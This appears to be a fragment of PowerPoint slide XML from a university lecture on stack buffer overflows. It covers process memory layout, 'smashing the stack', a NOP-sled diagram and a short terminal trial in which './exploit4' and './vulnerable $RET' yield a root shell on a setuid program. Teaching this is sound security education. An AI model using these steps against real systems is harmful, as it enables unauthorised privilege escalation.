            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3652" y="2971"/>
              <a:ext cx="635" cy="31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addr</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22549" name="Rectangle 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3652" y="3289"/>
              <a:ext cx="635" cy="2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addr</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22550" name="Rectangle 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3652" y="1565"/>
              <a:ext cx="635" cy="2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1800">
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>addr</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="22533" name="Object 21">
            <a:hlinkClick r:id="" action="ppaction://ole?verb=1"/>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1311302359"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="755650" y="3068638"/>
          <a:ext cx="2808288" cy="2193925"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s22597" name="Wordpad Document" showAsIcon="1" r:id="rId4" imgW="914400" imgH="714240" progId="WordPad.Document.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Wordpad Document" showAsIcon="1" r:id="rId4" imgW="914400" imgH="714240" progId="WordPad.Document.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Object 21"/>
                      <p:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </p:cNvPicPr>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId5"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="755650" y="3068638"/>
                        <a:ext cx="2808288" cy="219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TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258886" y="1469871"/>
            <a:ext cx="2362200" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-HK" dirty="0"/>
              <a:t>Stack diagram for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" dirty="0" err="1"/>
              <a:t>vulnerable.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3392486" y="2300868"/>
            <a:ext cx="384178" cy="38417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6553200" y="1059426"/>
            <a:ext cx="2362200" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-HK" dirty="0"/>
              <a:t>Generated by exploit4.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6202363" y="2059637"/>
            <a:ext cx="538163" cy="3940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6126160" y="5509557"/>
            <a:ext cx="2419351" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-HK" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" sz="2000" dirty="0"/>
              <a:t> tries to point to any NOP in $EGG</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Arrow Connector 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6507956" y="3506787"/>
            <a:ext cx="214312" cy="186412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Arrow Connector 28"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="22537" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7460457" y="2039755"/>
            <a:ext cx="113505" cy="57247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9BADC5EE-F15F-4E4C-9132-FA8D11337C9C}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="609600"/>
            <a:ext cx="7772400" cy="5943600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If the vulnerable program is owned by root with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> permission set, we can access the root account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Trial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mhwong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>]$ ./exploit4 768</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>using address: 0xbffff9d8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mhwong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>]$ ./vulnerable $RET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>bash# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>bash#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hacker: “Ha! Ha! Ha! …I am the root now!!”</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17C5F657-AF92-4DE5-A787-AD04DBF204CB}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35842" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41988" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Aleph One, “Smashing The Stack for Fun and Profit”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Phrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> 49 Volume 7, Issue 49, File 14 of 16.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219C9A6E-73A0-4244-AB61-8A2C1B139C59}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="533400"/>
            <a:ext cx="7772400" cy="5562600"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>In many C/C++ implementations, it is possible to corrupt this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execution stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>by writing past the end of an array.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>smash the stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>When the function terminates, the control flow will jump to a random address in the memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>A hacker can control the program flow by using carefully crafted set of data to write past the end of the array.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>We will demonstrate that the hacker can obtain the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>in Linux by using this technique.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1614361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219C9A6E-73A0-4244-AB61-8A2C1B139C59}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="533400"/>
            <a:ext cx="7772400" cy="6172200"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Buffer overflow has been discovered for over 20 years and many efforts have been made to fix such vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>However, many modern systems nowadays may still be vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Most operating systems nowadays are fully or at least partially written in C/C++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Many existing software are written in C/C++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Microsoft Office</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Various computer games</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>Many game engines are written in C++, e.g., Unity, Unreal Engine, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>CryENGINE</a:t>
            </a:r>
            <a:endParaRPr lang="en-HK" altLang="zh-TW" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>When we develop/maintain a software/an operating system, we still need to pay attention to this vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="816935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E36F73E2-E286-4C0D-8F50-8446DB27DC2F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152400"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>Process Memory Organization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4100" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2822575" y="1828800"/>
            <a:ext cx="2286000" cy="1143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Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4101" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2822575" y="2971800"/>
            <a:ext cx="2286000" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33CC33"/>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Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4102" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2822575" y="4267200"/>
            <a:ext cx="2286000" cy="1371600"/>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Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4103" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5473700" y="1614488"/>
            <a:ext cx="11557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2000"/>
              <a:t>Lower</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4104" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5473700" y="4814888"/>
            <a:ext cx="11557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2000"/>
              <a:t>Higher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4105" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2670175" y="6096000"/>
            <a:ext cx="2790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2000"/>
              <a:t>Process Memory Regions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9D20C60B-BC57-402A-8C5A-C7F0BF70F0D9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="609600"/>
            <a:ext cx="7772400" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Text region</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Fixed by the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Includes code (instructions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Read only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Data region</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Contains initialized and uninitialized data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Static variables are stored here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Stack region</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Last in, first out (LIFO)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5124" name="Group 7"/>
